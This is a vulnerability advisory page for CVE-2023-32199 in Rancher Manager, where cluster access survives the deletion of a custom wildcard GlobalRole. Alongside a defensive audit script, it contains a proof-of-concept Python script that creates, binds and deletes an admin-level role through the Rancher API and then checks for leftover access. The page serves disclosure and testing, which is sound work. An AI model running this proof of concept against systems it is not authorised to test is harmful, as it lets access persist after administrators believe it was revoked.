Security Vulnerability Report

CVE-2023-32199 (CVSS 4.3 MEDIUM)

Published: 2025-10-29 15:15:40
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability has been identified in Rancher Manager: after a custom GlobalRole that grants administrative access, or the GlobalRoleBinding that assigns it, is removed, the bound user still retains access to clusters. Only custom GlobalRoles are affected, and only those that carry a rule granting all verbs (*) on all resources (*) in all API groups (*), or all verbs (*) on all non-resource URLs (*). Because such a role must be created and bound by an administrator in the first place (reflected in the PR:H / UI:R vector below), the weakness is a failure to revoke permissions (CWE-281, Improper Preservation of Permissions) rather than a way for a low-privileged user to obtain admin rights; the practical risk is that an administrator believes access was withdrawn when it was not.
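An added audit example, not part of the advisory or of Rancher's code, that applies the rule shape described above to GlobalRole and GlobalRoleBinding objects: it flags custom roles with a full-wildcard rule, lists the subjects bound to them, and reports bindings whose role no longer exists (the leftover you would expect after deleting a role). The input objects are constructed here; they assume the JSON shape that `kubectl get globalroles,globalrolebindings -o json` returns from the Rancher local cluster, and the `builtin` field that Rancher sets on its own roles (an assumption about the CRD, not stated on this page).

```python
# Added example (not Rancher's code): audit GlobalRoles for the wildcard
# pattern CVE-2023-32199 describes and show who is bound to them.
# The objects below are constructed, minimal management.cattle.io/v3
# GlobalRole / GlobalRoleBinding documents; the `builtin` field is assumed.
import json

SAMPLE_GLOBAL_ROLES = json.loads("""
{"items": [
  {"metadata": {"name": "admin"}, "builtin": true,
   "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
  {"metadata": {"name": "custom-superadmin"},
   "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
  {"metadata": {"name": "custom-nonresource-all"},
   "rules": [{"nonResourceURLs": ["*"], "verbs": ["*"]}]},
  {"metadata": {"name": "custom-settings-viewer"},
   "rules": [{"apiGroups": ["management.cattle.io"], "resources": ["settings"],
              "verbs": ["get", "list"]}]},
  {"metadata": {"name": "custom-star-resources-only"},
   "rules": [{"apiGroups": ["management.cattle.io"], "resources": ["*"], "verbs": ["*"]}]}
]}
""")

SAMPLE_BINDINGS = json.loads("""
{"items": [
  {"metadata": {"name": "grb-1"}, "globalRoleName": "custom-superadmin", "userName": "u-alice"},
  {"metadata": {"name": "grb-2"}, "globalRoleName": "custom-nonresource-all",
   "groupPrincipalName": "okta_group://ops"},
  {"metadata": {"name": "grb-3"}, "globalRoleName": "custom-settings-viewer", "userName": "u-bob"},
  {"metadata": {"name": "grb-4"}, "globalRoleName": "deleted-role", "userName": "u-carol"}
]}
""")


def is_full_wildcard_rule(rule):
    """True when a PolicyRule has the affected shape from the advisory:
    '*' verbs on '*' resources in '*' apiGroups, or '*' verbs on '*' nonResourceURLs.
    A '*' on resources inside one named apiGroup does NOT match."""
    if "*" not in rule.get("verbs", []):
        return False
    if "*" in rule.get("nonResourceURLs", []):
        return True
    return "*" in rule.get("resources", []) and "*" in rule.get("apiGroups", [])


def affected_global_roles(roles):
    """Names of custom (non-builtin) GlobalRoles with at least one full-wildcard rule."""
    names = []
    for role in roles["items"]:
        if role.get("builtin"):
            continue  # built-in roles are out of scope: the advisory covers custom roles only
        if any(is_full_wildcard_rule(r) for r in role.get("rules", [])):
            names.append(role["metadata"]["name"])
    return names


def subjects_bound_to(bindings, role_names):
    """Map each affected role to the users / group principals bound to it."""
    bound = {name: [] for name in role_names}
    for b in bindings["items"]:
        role = b.get("globalRoleName")
        if role in bound:
            bound[role].append(b.get("userName") or b.get("groupPrincipalName"))
    return bound


def dangling_bindings(bindings, roles):
    """Bindings whose GlobalRole no longer exists. After deleting a role these are
    what remains; on an affected version the subject may still hold the access."""
    existing = {r["metadata"]["name"] for r in roles["items"]}
    return [b["metadata"]["name"] for b in bindings["items"]
            if b.get("globalRoleName") not in existing]


def audit(roles=SAMPLE_GLOBAL_ROLES, bindings=SAMPLE_BINDINGS):
    """Full report: affected roles, who is bound to them, and dangling bindings."""
    affected = affected_global_roles(roles)
    return {
        "affected_roles": affected,
        "bound_subjects": subjects_bound_to(bindings, affected),
        "dangling_bindings": dangling_bindings(bindings, roles),
    }


if __name__ == "__main__":
    print(json.dumps(audit(), indent=2))
```

Every subject the report lists should be re-checked with that subject's own credentials after the role or binding is removed; listing the bindings from the admin side says nothing about whether Rancher actually recomputed the subject's permissions.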

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

Affected versions, as listed in the advisory (NVD itself records no configuration data for this entry):

Rancher Manager < v2.7.13
Rancher Manager v2.8.0 - v2.8.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.

The script needs two API tokens: an admin token that creates and deletes the role, and a token belonging to the target user, because the final access check is only meaningful when it is made as that user (checking with the admin token always succeeds). The target user should hold no other cluster or project bindings, or the check cannot distinguish leaked access from legitimate access.

```python
# CVE-2023-32199 PoC - Rancher Manager GlobalRole privileges not revoked
# This PoC demonstrates the vulnerability where a user retains access after GlobalRole deletion.
import time
import requests

RANCHER_URL = "https://rancher.example.com"
API_TOKEN = "token-xxxxx:xxxxxxxxxxxxx"        # admin API token: creates and deletes the role
USER_API_TOKEN = "token-yyyyy:yyyyyyyyyyyyy"   # API token of the target user: used for the access check
TARGET_USER = "attacker-user"                  # Rancher user ID of the target user (u-xxxxx form on a real server)
HEADERS = {"Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json"}
USER_HEADERS = {"Authorization": f"Bearer {USER_API_TOKEN}", "Content-Type": "application/json"}

# Steve (/v1) collection names are lowercase plural
GLOBALROLES = f"{RANCHER_URL}/v1/management.cattle.io.globalroles"
GLOBALROLEBINDINGS = f"{RANCHER_URL}/v1/management.cattle.io.globalrolebindings"
CLUSTERS = f"{RANCHER_URL}/v1/management.cattle.io.clusters"


def create_malicious_globalrole():
    """Step 1: Create a GlobalRole with the affected shape: * verbs on * resources in
    * apiGroups, plus * verbs on * non-resource URLs"""
    payload = {
        "type": "globalRole",
        "metadata": {"name": "malicious-admin-role"},
        "rules": [
            {"resources": ["*"], "apiGroups": ["*"], "verbs": ["*"]},
            {"nonResourceURLs": ["*"], "verbs": ["*"]},
        ],
    }
    response = requests.post(GLOBALROLES, headers=HEADERS, json=payload)
    response.raise_for_status()
    return response.json()["metadata"]["name"]


def bind_role_to_user(role_name, username):
    """Step 2: Bind the GlobalRole to the target user"""
    payload = {
        "type": "globalRoleBinding",
        "metadata": {"generateName": "grb-"},
        "globalRoleName": role_name,
        "userName": username,
    }
    response = requests.post(GLOBALROLEBINDINGS, headers=HEADERS, json=payload)
    response.raise_for_status()
    return response.json()["metadata"]["name"]


def delete_globalrole(role_name):
    """Step 3: Admin deletes the GlobalRole (the advisory says deleting the binding instead
    has the same effect)"""
    requests.delete(f"{GLOBALROLES}/{role_name}", headers=HEADERS).raise_for_status()


def user_cluster_count():
    """Number of clusters visible to the target user; 0 when the request is refused"""
    response = requests.get(CLUSTERS, headers=USER_HEADERS)
    if response.status_code != 200:
        return 0
    return len(response.json().get("data", []))


def verify_persistence(username):
    """Step 4: Verify, as the target user, whether cluster access survived the deletion"""
    count = user_cluster_count()
    if count:
        print(f"[!] VULNERABLE: User '{username}' still lists {count} cluster(s) after GlobalRole deletion!")
        return True
    print("[+] PATCHED: Access properly revoked")
    return False


if __name__ == "__main__":
    role_name = create_malicious_globalrole()
    bind_role_to_user(role_name, TARGET_USER)
    time.sleep(10)  # Rancher's controllers grant the access asynchronously
    if not user_cluster_count():
        raise SystemExit("binding did not grant cluster access; check the tokens and user ID before testing")
    delete_globalrole(role_name)
    time.sleep(30)  # revocation is also asynchronous; let the controllers reconcile before judging
    verify_persistence(TARGET_USER)
```

References

https://bugzilla.suse.com/show_bug.cgi?id=CVE-2023-32199
https://github.com/rancher/rancher/security/advisories/GHSA-j4vr-pcmw-hx59
Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-32199", "sourceIdentifier": "[email protected]", "published": "2025-10-29T15:15:40.260", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified within Rancher \nManager, where after removing a custom GlobalRole that gives \nadministrative access or the corresponding binding, the user still \nretains access to clusters. This only affects custom Global Roles that have a * on * in * rule for resources or have a * on * rule for non-resource URLs"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}]}], "references": [{"url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2023-32199", "source": "[email protected]"}, {"url": "https://github.com/rancher/rancher/security/advisories/GHSA-j4vr-pcmw-hx59", "source": "[email protected]"}]}}